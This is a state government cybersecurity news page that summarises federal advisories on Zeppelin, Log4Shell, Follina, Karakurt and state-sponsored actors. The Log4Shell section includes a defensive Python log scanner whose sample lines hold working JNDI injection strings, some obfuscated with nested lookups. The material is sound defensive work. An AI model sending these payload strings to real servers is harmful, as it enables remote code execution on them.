State Government Cyber Updates

ACTIVE THREATS

Zeppelin Ransomware - Alert AA22-223A (updated 08/11/2022)

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Zeppelin ransomware IOCs and TTPs associated with ransomware variants identified through FBI investigations as recently as 21 June 2022. The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report: pdf, 999 kb
Download the YARA signature for Zeppelin: YARA Signature, .yar 125 kb
Download the IOCs: .stix 113 kb

----------------------------------------------------------------------------

CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability (updated 06/02/2022)  

On Monday, May 30, 2022, Microsoft published guidance for CVE-2022-30190, a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. Remote code execution is possible when MSDT is invoked through its URL protocol (ms-msdt:) from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application, and can then install programs; view, change, or delete data; or create new accounts in the context allowed by the user's rights. Until the fix is applied, Microsoft's published workaround is to disable the MSDT URL protocol handler.

The MSRC Team will continue to update CVE-2022-30190; please visit their CVE-2022-30190 page for further information.

----------------------------------------------------------------------------

Apache Log4j Vulnerability and the Log4shell exploit(s), Winter 2022 (updated 01/25/2022)

Log4j is a ubiquitous Java logging library used to record activity in a wide range of systems, from consumer-facing products and services to enterprise software and web applications. A critical vulnerability in it, CVE-2021-44228 (known as Log4Shell), allows unauthenticated remote code execution (RCE): an attacker who can get a crafted lookup string (a JNDI lookup) into any value the application logs can make the vulnerable server fetch and run attacker-controlled code. That foothold has been used to deploy ransomware and crypto miners and to exfiltrate data. Because the trigger is simply a logged string, it can be delivered over any protocol whose input ends up in a log, including HTTP, SMTP, IMAP, DNS, and LDAP, so exposure is not limited to web servers. This vulnerability is being widely exploited by a growing set of attackers, and we urge you to take action.
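
One way to hunt for Log4Shell probes in logs you already have, added here as an example and not taken from the Strategic Technology Solutions guide or CISA's guidance: the script folds the lookup-nesting tricks attackers used to hide the string "jndi" (${lower:j}, ${upper:j}, the ${x:-j} default-value form), URL-decodes query strings, and reports which scheme (ldap, rmi, dns) the lookup asked for. The log lines are constructed for the example and do not describe any real incident.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample log lines (not taken from any real incident). Log4Shell
# probes commonly arrived in fields that applications log verbatim, such as the
# HTTP User-Agent, a request parameter or an SMTP HELO name.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.23/x}"',
    'smtp-in: HELO ${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.40:1099/obj} from 203.0.113.11',
    '203.0.113.13 - - [10/Dec/2021:14:02:19 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.50%2Fa%7D HTTP/1.1" 200 12 "-" "curl/7.68"',
    '203.0.113.15 - - [10/Dec/2021:14:02:21 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 12 "-" "curl/7.68"',
]

# An innermost lookup: ${...} whose body contains no further braces.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# A (normalized) JNDI lookup and its scheme, e.g. ${jndi:ldap://...}
JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Statically fold one innermost lookup the way Log4j 2 would evaluate it.

    Only the lookups attackers used to disguise "jndi" are handled:
    ${lower:x}, ${upper:x} and the default-value form ${anything:-x}.
    Returning None leaves the lookup in place (jndi itself included).
    """
    low = body.lower()
    if low.startswith("jndi:"):
        return None                      # this is what we are hunting for
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${env:NOPE:-j} and ${::-j} both yield "j"
    return None                          # e.g. ${env:HOME}: not an evasion we can fold


def normalize(text: str, max_passes: int = 16) -> str:
    """Fold innermost lookups repeatedly until nothing changes.

    Passes are capped so a hostile line with thousands of nested lookups
    cannot make the scanner itself spin.
    """
    for _ in range(max_passes):
        changed = False

        def fold(m: "re.Match[str]") -> str:
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNERMOST.sub(fold, text)
        if not changed:
            break
    return text


def scan_line(line: str) -> Optional[Tuple[str, bool]]:
    """Return (scheme, was_disguised) if the line carries a JNDI lookup.

    URL-decoding first catches %24%7Bjndi... as sent in query strings;
    was_disguised is True when decoding or folding was needed to see it.
    """
    norm = normalize(unquote(line))
    m = JNDI.search(norm)
    if not m:
        return None
    return m.group(1).lower(), norm != line


def scan(lines: List[str]) -> List[Tuple[int, str, bool]]:
    """Scan many lines; return (1-based line number, scheme, was_disguised)."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = scan_line(line)
        if result is not None:
            hits.append((number, result[0], result[1]))
    return hits


if __name__ == "__main__":
    for number, scheme, disguised in scan(SAMPLE_LOGS):
        flag = " (disguised)" if disguised else ""
        print(f"line {number}: JNDI lookup via {scheme}{flag}")
```

A hit means someone sent a probe, not that it worked: confirm by looking for outbound LDAP, RMI or DNS connections from the application host around that timestamp, and patch or remove the JndiLookup class regardless of what the scan finds. The folding covers only the lower/upper/default-value lookups, so treat a clean result as triage, not proof of absence.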

For more information, please view the Strategic Technology Solutions Apache Log4j Vulnerability Exploit Quick Guide (PDF download), or CISA's Log4j Vulnerability Guidance site.  For further questions, you can reach out to the CISO’s office through the CyberSafeTN contact form.

NEWS & UPDATES

CISA Updates Infrastructure Resilience Planning Framework (11/29/22) - The framework provides guidance and resources for improving the security and resilience of critical infrastructure. The update adds guidance on incorporating diverse perspectives into planning efforts and on drought-related risks.

CISA Releases New Red Team Tool – RedEye (10/14/2022) - CISA released RedEye, an interactive open-source analytic tool for Red Teams to visualize and report command-and-control activity. The tool was developed in partnership with the Department of Energy's Pacific Northwest National Laboratory. It allows a Red Team operator to quickly assess the complex data from an engagement or penetration test (pen test), evaluate mitigation strategies, and support effective decision making to strengthen an organization's cybersecurity posture.

RedEye ingests Cobalt Strike logs from a pen test or Red Team engagement that used Cobalt Strike, arranges them so they can be queried easily, and displays them in a graphical timeline. Operators can tag and comment on activities in the tool and then use its presentation mode to walk stakeholders through findings and workflow.

Using this tool, Red Teams can quickly organize information and communicate findings, key events, and penetration paths, which would otherwise mean manually scrolling through thousands of lines of text. For more information, CISA encourages users to review RedEye on GitHub and watch CISA's RedEye tool overview video.

CISA, NSA and FBI Release Advisory on PRC State-Sponsored Malicious Cyber Activity  (10/06/2022) - The Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) with details about the top vulnerabilities used and exploited since 2020 by the People’s Republic of China (PRC) state-sponsored cyber actors to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.

PRC state-sponsored actors continue to use virtual private networks (VPNs) to obfuscate their activities and target web-facing applications to establish initial access. Most of the listed common vulnerabilities and exposures (CVEs) allow remote code execution, meaning an adversary could exploit them to gain unauthorized access and take control of an affected system. Many of the vulnerabilities in this CSA let the actors operate stealthily while gaining unauthorized access to sensitive networks. Once inside, they seek to establish persistence and move laterally to other internally connected networks.

The CSA provides an appendix with a clear, concise description of each CVE, the vulnerable technologies and versions, and recommended mitigations and detection methods where they exist. Actions in this CSA that can help protect networks include:

  • Update and patch systems, prioritizing the vulnerabilities listed in this CSA and in CISA's Known Exploited Vulnerabilities catalog.
  • Use phishing-resistant multi-factor authentication whenever possible.  
  • Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised. 
  • Block obsolete or unused protocols at the network edge. 
  • Upgrade or replace end-of-life devices. 
  • Move toward the Zero Trust security model.
  • Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.

Joint Cybersecurity Advisory from CISA and FBI regarding Zeppelin Ransomware (8/11/2022) - The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) recently released a joint Cybersecurity Advisory (CSA) with technical details on Zeppelin ransomware, along with recommended actions, mitigations, and resources organizations can use to protect against and respond to this threat.

Observed as recently as April 2022, malicious actors using Zeppelin gain initial access to victims' networks by exploiting vulnerabilities in Remote Desktop Protocol (RDP) and SonicWall firewalls and through phishing campaigns. The advisory contains several indicators of compromise (file hashes) that network defenders can use to detect whether this threat is present on their networks.

A Message from CISA Regarding Karakurt Data Extortion Group (6/1/2022)

In partnership with the FBI, Treasury, and FinCEN, CISA published a joint Cybersecurity Advisory (CSA) with recommended actions and mitigations for organizations to protect against the reported tactics, techniques, and procedures (TTPs) of the Karakurt data extortion group, which has been creating significant challenges for defense and mitigation.

Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors claim to steal data and threaten to auction it off or release it publicly unless the demanded ransom is paid. As of May 2022, Karakurt-operated websites on the deep web and the dark web were reported to hold several terabytes of data purported to belong to victims across North America and Europe, along with several "press releases" naming victims who had not paid or cooperated and instructions for participating in victim data "auctions".

During reconnaissance, Karakurt actors appear to obtain access to victim devices primarily by purchasing stolen login credentials. They also obtain access to already-compromised victims from cooperating partners in the cybercrime community or by buying it through third-party intrusion broker networks.

Actions that organizational leaders and network administrators can take today to mitigate cyber threats from ransomware include prioritizing patching of known exploited vulnerabilities, training users to recognize and report phishing attempts, and enforcing multi-factor authentication (MFA). Further recommended mitigations include:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location.
  • Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.
  • Regularly back up data and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update antivirus software on all hosts and enable real-time detection.
  • Review domain controllers, servers, workstations, and Active Directory for new or unrecognized accounts.

Organizations are encouraged to review the advisory for all the details on the Karakurt actors, associated indicators of compromise, malicious behavior mapped to MITRE ATT&CK, and agency resources available to all organizations.  

All organizations should share information about incidents and unusual cyber activity with CISA and/or FBI. When cyber incidents are reported quickly, it can contribute to stopping further attacks. Organizations should inform CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870, or an FBI field office.

Your support to amplify this advisory through your communications and social media channels is appreciated. And as always, thank you for your continued collaboration. 


Alert (AA22-011A) Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure:

updated 01/25/2022 - Alert AA22-011A (CISA website)

This joint Cybersecurity Advisory (CSA)—authored by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA)—is part of our continuing cybersecurity mission to warn organizations of cyber threats and help the cybersecurity community reduce the risk presented by these threats. This CSA provides an overview of Russian state-sponsored cyber operations; commonly observed tactics, techniques, and procedures (TTPs); detection actions; incident response guidance; and mitigations. CISA, the FBI, and NSA encourage the cybersecurity community—especially critical infrastructure network defenders—to adopt a heightened state of awareness and to conduct proactive threat hunting, as outlined in the Detection section. Additionally, CISA, the FBI, and NSA strongly urge network defenders to implement the recommendations detailed in the Mitigations section. These mitigations will help organizations improve their functional resilience by reducing the risk of compromise or severe business degradation. For more information, please visit https://www.cisa.gov/uscert/ncas/alerts/aa22-011a.


Cyber Storm VIII Exercise, Spring 2022:

updated 08/06/2021 - CS VIII States Brief

  • As part of CISA’s efforts to strengthen cybersecurity preparedness and partnerships, we would like to provide some information regarding the upcoming Cyber Storm VIII exercise in Spring 2022.
  • Cyber Storm is CISA’s biennial cyber capstone exercise that provides a venue for participants to simulate the discovery of and response to a widespread coordinated cyberattack without the consequences of a real-world event. Cyber Storm brings together hundreds of agencies and organizations from across the public and private sectors to simulate response and coordination efforts to a significant cyber incident impacting the nation’s critical infrastructure with the aim of strengthening cybersecurity preparedness and response capabilities by exercising policies, processes, and procedures.
  • Cyber Storm is a distributed exercise, meaning organizations participate from their actual work locations. Interested states can participate either as a Victim organization or elect to participate in tandem with MS-ISAC as a Monitor and Respond organization. Victim organizations are directly affected by the incident, whereas Monitor and Respond organizations utilize normal communication channels, such as the MS-ISAC and government bulletins, to monitor events during the exercise and respond appropriately. 
  • States interested in participating as Victim organizations will actively work with the Cyber Storm Planning Team over the course of the fall and winter to plan the extent of their organization’s participation in the exercise and develop customized scenario injects to meet their organization’s unique goals and level of play.
  • The next planning meeting is the Midterm Planning Meeting, scheduled to be held in-person and virtually in McLean, VA, on September 16, 2021.
  • The Cyber Storm Planning Team looks forward to working with members of your organization as we work together to increase cybersecurity preparedness and strengthen partnerships. For your convenience, we attached a quick overview of Cyber Storm VIII. Please contact Marshall Garnuette (Garnuette_Marshall@bah.com), Cyber Storm States Working Group Lead, to learn more about participating in Cyber Storm VIII.